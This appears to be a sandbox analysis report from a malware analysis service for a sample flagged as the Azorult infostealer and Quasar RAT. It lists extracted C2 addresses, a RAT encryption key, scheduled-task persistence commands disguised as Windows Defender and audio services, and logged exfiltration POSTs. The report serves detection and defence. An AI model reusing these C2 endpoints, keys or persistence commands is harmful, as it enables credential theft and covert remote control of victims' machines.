Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

HashIs-aab...35.exe

windows7-x64

10

HashIs-aab...35.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    5s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/12/2024, 12:46 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe

  • Size

    2.0MB

  • MD5

    71254d11715816c90a2e6f5b3cd3b020

  • SHA1

    e97d074667058c075210de8cc5e8cec0277f30dc

  • SHA256

    aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35

  • SHA512

    91a9f217b39050b690ca8b299b042348b2327f93f0d03c310ed4b79df3eb3747806dfd8401a16c42bb75490e04cef508474e04509e72c6b3d3b6c6e9ad815ece

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYf:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YB

Score
10/10
azorultquasarebayprofilesdiscoveryinfostealerspywaretrojan

Malware Config

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443
Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Azorult family
    azorult
  • Quasar RAT 3 IoCs

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
    "C:\Users\Admin\AppData\Local\Temp\HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe"
    1⤵
    • Quasar RAT
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
          PID:960
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 556
          3⤵
          • Program crash
          PID:3884
      • C:\Users\Admin\AppData\Local\Temp\windef.exe
        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4420
        • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3948
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:5076
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pMXiLzecL3Ep.bat" "
            4⤵
              PID:4404
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                5⤵
                  PID:5092
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 10 localhost
                  5⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:800
                • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                  "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                  5⤵
                    PID:4792
                    • C:\Windows\SysWOW64\schtasks.exe
                      "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
                      6⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:1640
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WcRtpUTMoxCx.bat" "
                      6⤵
                        PID:3504
                        • C:\Windows\SysWOW64\chcp.com
                          chcp 65001
                          7⤵
                            PID:4560
                          • C:\Windows\SysWOW64\PING.EXE
                            ping -n 10 localhost
                            7⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:1968
                          • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                            "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                            7⤵
                              PID:2892
                              • C:\Windows\SysWOW64\schtasks.exe
                                "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
                                8⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:372
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 2252
                            6⤵
                            • Program crash
                            PID:3088
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 2260
                        4⤵
                        • Program crash
                        PID:3788
                  • C:\Users\Admin\AppData\Local\Temp\HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                    "C:\Users\Admin\AppData\Local\Temp\HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1476
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                    2⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1256
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2872 -ip 2872
                  1⤵
                    PID:2596
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3948 -ip 3948
                    1⤵
                      PID:4548
                    • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                      C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                      1⤵
                        PID:4988
                        • C:\Users\Admin\AppData\Local\Temp\vnc.exe
                          "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
                          2⤵
                            PID:4512
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k
                              3⤵
                                PID:2448
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 532
                                3⤵
                                • Program crash
                                PID:992
                            • C:\Users\Admin\AppData\Local\Temp\windef.exe
                              "C:\Users\Admin\AppData\Local\Temp\windef.exe"
                              2⤵
                                PID:4580
                              • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                                "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
                                2⤵
                                  PID:1612
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                                  2⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1224
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4512 -ip 4512
                                1⤵
                                  PID:1288
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4792 -ip 4792
                                  1⤵
                                    PID:2204
                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                    1⤵
                                      PID:1492
                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                      1⤵
                                        PID:4644

                                      Network

                                      • flag-us
                                        DNS
                                        8.8.8.8.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        8.8.8.8.in-addr.arpa
                                        IN PTR
                                        Response
                                        8.8.8.8.in-addr.arpa
                                        IN PTR
                                        dnsgoogle
                                      • flag-us
                                        DNS
                                        0x21.in
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        0x21.in
                                        IN A
                                        Response
                                        0x21.in
                                        IN A
                                        44.221.84.105
                                      • flag-us
                                        DNS
                                        228.249.119.40.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        228.249.119.40.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        172.214.232.199.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        172.214.232.199.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        POST
                                        http://0x21.in:8000/_az/
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        Remote address:
                                        44.221.84.105:8000
                                        Request
                                        POST /_az/ HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                        Host: 0x21.in:8000
                                        Content-Length: 99
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Sun, 01 Dec 2024 12:46:17 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: btst=31a4c7d7172daf7a43696dc5e7023b19|181.215.176.83|1733057177|1733057177|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      • flag-us
                                        DNS
                                        0x21.in
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        0x21.in
                                        IN A
                                        Response
                                        0x21.in
                                        IN A
                                        44.221.84.105
                                      • flag-us
                                        POST
                                        http://0x21.in/_az/
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        Remote address:
                                        44.221.84.105:8000
                                        Request
                                        POST /_az/ HTTP/1.0
                                        Host: 0x21.in
                                        Connection: close
                                        User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                        Content-Length: 99
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Sun, 01 Dec 2024 12:46:17 GMT
                                        Content-Type: text/html
                                        Connection: close
                                        Set-Cookie: btst=b28a42f3ef59c74522961a2a1099d04c|181.215.176.83|1733057177|1733057177|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      • flag-us
                                        DNS
                                        105.84.221.44.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        105.84.221.44.in-addr.arpa
                                        IN PTR
                                        Response
                                        105.84.221.44.in-addr.arpa
                                        IN PTR
                                        ec2-44-221-84-105 compute-1 amazonawscom
                                      • flag-us
                                        DNS
                                        ip-api.com
                                        winsock.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        ip-api.com
                                        IN A
                                        Response
                                        ip-api.com
                                        IN A
                                        208.95.112.1
                                      • flag-us
                                        GET
                                        http://ip-api.com/json/
                                        windef.exe
                                        Remote address:
                                        208.95.112.1:80
                                        Request
                                        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Date: Sun, 01 Dec 2024 12:46:18 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 291
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 57
                                        X-Rl: 43
                                      • flag-us
                                        DNS
                                        1.112.95.208.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        1.112.95.208.in-addr.arpa
                                        IN PTR
                                        Response
                                        1.112.95.208.in-addr.arpa
                                        IN PTR
                                        ip-apicom
                                      • flag-us
                                        GET
                                        http://ip-api.com/json/
                                        winsock.exe
                                        Remote address:
                                        208.95.112.1:80
                                        Request
                                        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Date: Sun, 01 Dec 2024 12:46:19 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 291
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 33
                                        X-Rl: 42
                                      • flag-us
                                        DNS
                                        71.159.190.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        71.159.190.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        95.221.229.192.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        95.221.229.192.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        58.55.71.13.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        58.55.71.13.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        sockartek.icu
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        sockartek.icu
                                        IN A
                                        Response
                                      • flag-us
                                        DNS
                                        50.23.12.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        50.23.12.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        171.39.242.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        171.39.242.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        92.12.20.2.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        92.12.20.2.in-addr.arpa
                                        IN PTR
                                        Response
                                        92.12.20.2.in-addr.arpa
                                        IN PTR
                                        a2-20-12-92deploystaticakamaitechnologiescom
                                      • flag-us
                                        DNS
                                        ip-api.com
                                        winsock.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        ip-api.com
                                        IN A
                                        Response
                                        ip-api.com
                                        IN A
                                        208.95.112.1
                                      • flag-us
                                        GET
                                        http://ip-api.com/json/
                                        Remote address:
                                        208.95.112.1:80
                                        Request
                                        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Date: Sun, 01 Dec 2024 12:46:55 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 291
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                      • flag-us
                                        POST
                                        http://0x21.in:8000/_az/
                                        Remote address:
                                        44.221.84.105:8000
                                        Request
                                        POST /_az/ HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                        Host: 0x21.in:8000
                                        Content-Length: 99
                                        Cache-Control: no-cache
                                        Cookie: snkz=181.215.176.83; btst=31a4c7d7172daf7a43696dc5e7023b19|181.215.176.83|1733057177|1733057177|0|1|0
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Sun, 01 Dec 2024 12:47:04 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: btst=31a4c7d7172daf7a43696dc5e7023b19|181.215.176.83|1733057224|1733057177|23|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                      • flag-us
                                        POST
                                        http://0x21.in/_az/
                                        Remote address:
                                        44.221.84.105:8000
                                        Request
                                        POST /_az/ HTTP/1.0
                                        Host: 0x21.in
                                        Connection: close
                                        User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                        Content-Length: 99
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Sun, 01 Dec 2024 12:47:05 GMT
                                        Content-Type: text/html
                                        Connection: close
                                        Set-Cookie: btst=8cde7ae99fd58253bf996f5b371f7869|181.215.176.83|1733057225|1733057225|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                        Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                      • flag-us
                                        DNS
                                        83.210.23.2.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        83.210.23.2.in-addr.arpa
                                        IN PTR
                                        Response
                                        83.210.23.2.in-addr.arpa
                                        IN PTR
                                        a2-23-210-83deploystaticakamaitechnologiescom
                                      • flag-us
                                        DNS
                                        sockartek.icu
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        sockartek.icu
                                        IN A
                                        Response
                                      • flag-us
                                        GET
                                        http://ip-api.com/json/
                                        Remote address:
                                        208.95.112.1:80
                                        Request
                                        GET /json/ HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Date: Sun, 01 Dec 2024 12:47:31 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 291
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                      • flag-us
                                        DNS
                                        sockartek.icu
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        sockartek.icu
                                        IN A
                                        Response
                                      • 44.221.84.105:8000
                                        http://0x21.in:8000/_az/
                                        http
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        528 B
                                         870 B
                                         6
                                        5

                                        HTTP Request

                                        POST http://0x21.in:8000/_az/

                                        HTTP Response

                                        200
                                      • 44.221.84.105:8000
                                        http://0x21.in/_az/
                                        http
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        471 B
                                         590 B
                                         5
                                        5

                                        HTTP Request

                                        POST http://0x21.in/_az/

                                        HTTP Response

                                        200
                                      • 208.95.112.1:80
                                        http://ip-api.com/json/
                                        http
                                        windef.exe
                                        374 B
                                         560 B
                                         5
                                        2

                                        HTTP Request

                                        GET http://ip-api.com/json/

                                        HTTP Response

                                        200
                                      • 208.95.112.1:80
                                        http://ip-api.com/json/
                                        http
                                        winsock.exe
                                        374 B
                                         560 B
                                         5
                                        2

                                        HTTP Request

                                        GET http://ip-api.com/json/

                                        HTTP Response

                                        200
                                      • 5.8.88.191:443
                                        winsock.exe
                                        260 B
                                         5
                                      • 208.95.112.1:80
                                        http://ip-api.com/json/
                                        http
                                        374 B
                                         560 B
                                         5
                                        2

                                        HTTP Request

                                        GET http://ip-api.com/json/

                                        HTTP Response

                                        200
                                      • 5.8.88.191:443
                                        260 B
                                         5
                                      • 44.221.84.105:8000
                                        http://0x21.in:8000/_az/
                                        http
                                        639 B
                                         791 B
                                         6
                                        5

                                        HTTP Request

                                        POST http://0x21.in:8000/_az/

                                        HTTP Response

                                        200
                                      • 44.221.84.105:8000
                                        http://0x21.in/_az/
                                        http
                                        471 B
                                         590 B
                                         5
                                        5

                                        HTTP Request

                                        POST http://0x21.in/_az/

                                        HTTP Response

                                        200
                                      • 208.95.112.1:80
                                        http://ip-api.com/json/
                                        http
                                        374 B
                                         560 B
                                         5
                                        2

                                        HTTP Request

                                        GET http://ip-api.com/json/

                                        HTTP Response

                                        200
                                      • 5.8.88.191:443
                                        260 B
                                         5
                                      • 8.8.8.8:53
                                        8.8.8.8.in-addr.arpa
                                        dns
                                        66 B
                                         90 B
                                         1
                                        1

                                        DNS Request

                                        8.8.8.8.in-addr.arpa

                                      • 8.8.8.8:53
                                        0x21.in
                                        dns
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        53 B
                                         69 B
                                         1
                                        1

                                        DNS Request

                                        0x21.in

                                        DNS Response

                                        44.221.84.105

                                      • 8.8.8.8:53
                                        228.249.119.40.in-addr.arpa
                                        dns
                                        73 B
                                         159 B
                                         1
                                        1

                                        DNS Request

                                        228.249.119.40.in-addr.arpa

                                      • 8.8.8.8:53
                                        172.214.232.199.in-addr.arpa
                                        dns
                                        74 B
                                         128 B
                                         1
                                        1

                                        DNS Request

                                        172.214.232.199.in-addr.arpa

                                      • 8.8.8.8:53
                                        0x21.in
                                        dns
                                        HashIs-aabf2738119a9e5ab03ccf72ee01e0fa4dae087478f1d437b0f0bbfbc412dc35.exe
                                        53 B
                                         69 B
                                         1
                                        1

                                        DNS Request

                                        0x21.in

                                        DNS Response

                                        44.221.84.105

                                      • 8.8.8.8:53
                                        105.84.221.44.in-addr.arpa
                                        dns
                                        72 B
                                         127 B
                                         1
                                        1

                                        DNS Request

                                        105.84.221.44.in-addr.arpa

                                      • 8.8.8.8:53
                                        ip-api.com
                                        dns
                                        winsock.exe
                                        56 B
                                         72 B
                                         1
                                        1

                                        DNS Request

                                        ip-api.com

                                        DNS Response

                                        208.95.112.1

                                      • 8.8.8.8:53
                                        1.112.95.208.in-addr.arpa
                                        dns
                                        71 B
                                         95 B
                                         1
                                        1

                                        DNS Request

                                        1.112.95.208.in-addr.arpa

                                      • 8.8.8.8:53
                                        71.159.190.20.in-addr.arpa
                                        dns
                                        72 B
                                         158 B
                                         1
                                        1

                                        DNS Request

                                        71.159.190.20.in-addr.arpa

                                      • 8.8.8.8:53
                                        95.221.229.192.in-addr.arpa
                                        dns
                                        73 B
                                         144 B
                                         1
                                        1

                                        DNS Request

                                        95.221.229.192.in-addr.arpa

                                      • 8.8.8.8:53
                                        58.55.71.13.in-addr.arpa
                                        dns
                                        70 B
                                         144 B
                                         1
                                        1

                                        DNS Request

                                        58.55.71.13.in-addr.arpa

                                      • 8.8.8.8:53
                                        sockartek.icu
                                        dns
                                        59 B
                                         124 B
                                         1
                                        1

                                        DNS Request

                                        sockartek.icu

                                      • 8.8.8.8:53
                                        50.23.12.20.in-addr.arpa
                                        dns
                                        70 B
                                         156 B
                                         1
                                        1

                                        DNS Request

                                        50.23.12.20.in-addr.arpa

                                      • 8.8.8.8:53
                                        171.39.242.20.in-addr.arpa
                                        dns
                                        72 B
                                         158 B
                                         1
                                        1

                                        DNS Request

                                        171.39.242.20.in-addr.arpa

                                      • 8.8.8.8:53
                                        92.12.20.2.in-addr.arpa
                                        dns
                                        69 B
                                         131 B
                                         1
                                        1

                                        DNS Request

                                        92.12.20.2.in-addr.arpa

                                      • 8.8.8.8:53
                                        ip-api.com
                                        dns
                                        winsock.exe
                                        56 B
                                         72 B
                                         1
                                        1

                                        DNS Request

                                        ip-api.com

                                        DNS Response

                                        208.95.112.1

                                      • 8.8.8.8:53
                                        83.210.23.2.in-addr.arpa
                                        dns
                                        70 B
                                         133 B
                                         1
                                        1

                                        DNS Request

                                        83.210.23.2.in-addr.arpa

                                      • 8.8.8.8:53
                                        sockartek.icu
                                        dns
                                        59 B
                                         124 B
                                         1
                                        1

                                        DNS Request

                                        sockartek.icu

                                      • 8.8.8.8:53
                                        sockartek.icu
                                        dns
                                        59 B
                                         124 B
                                         1
                                        1

                                        DNS Request

                                        sockartek.icu

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log
                                        Filesize

                                        1KB

                                        MD5

                                        10eab9c2684febb5327b6976f2047587

                                        SHA1

                                        a12ed54146a7f5c4c580416aecb899549712449e

                                        SHA256

                                        f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928

                                        SHA512

                                        7e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\WcRtpUTMoxCx.bat
                                        Filesize

                                        208B

                                        MD5

                                        16c933c2dae1dd28898d8e81922dd5a5

                                        SHA1

                                        31b1d12ca147d95a24051550e1f716fb11a954f7

                                        SHA256

                                        6f27e22357cd43b329f66db2034699ebbdbe7792e5d95d78f48f765429262d78

                                        SHA512

                                        0eed504fb039d8eb51061c32ee700540e36ef93624bbba70d3398d8a465fc32dc45c1285f5341d59313d814182348b11b2c746f50f787dfaed48ae37ba3adc0c

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\pMXiLzecL3Ep.bat
                                        Filesize

                                        208B

                                        MD5

                                        ac9a53ea2367b2f7673a1734f42a7217

                                        SHA1

                                        ef82139a5d9b0ade873d5baf9e5920a1b4b7e6cf

                                        SHA256

                                        5aa33e9e0037000009088e57847df19e2d91f4587eff4853c5c7e04b8b9a782c

                                        SHA512

                                        49e5bc9fd2fcd6e8a5e79037d9e774c198847f74bc1b5004c678c597e1b2a65413127bb81155a9088b0f8ffc5ac61ac82ec1dab881c18a3bc85c559423902a5e

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\vnc.exe
                                        Filesize

                                        405KB

                                        MD5

                                        b8ba87ee4c3fc085a2fed0d839aadce1

                                        SHA1

                                        b3a2e3256406330e8b1779199bb2b9865122d766

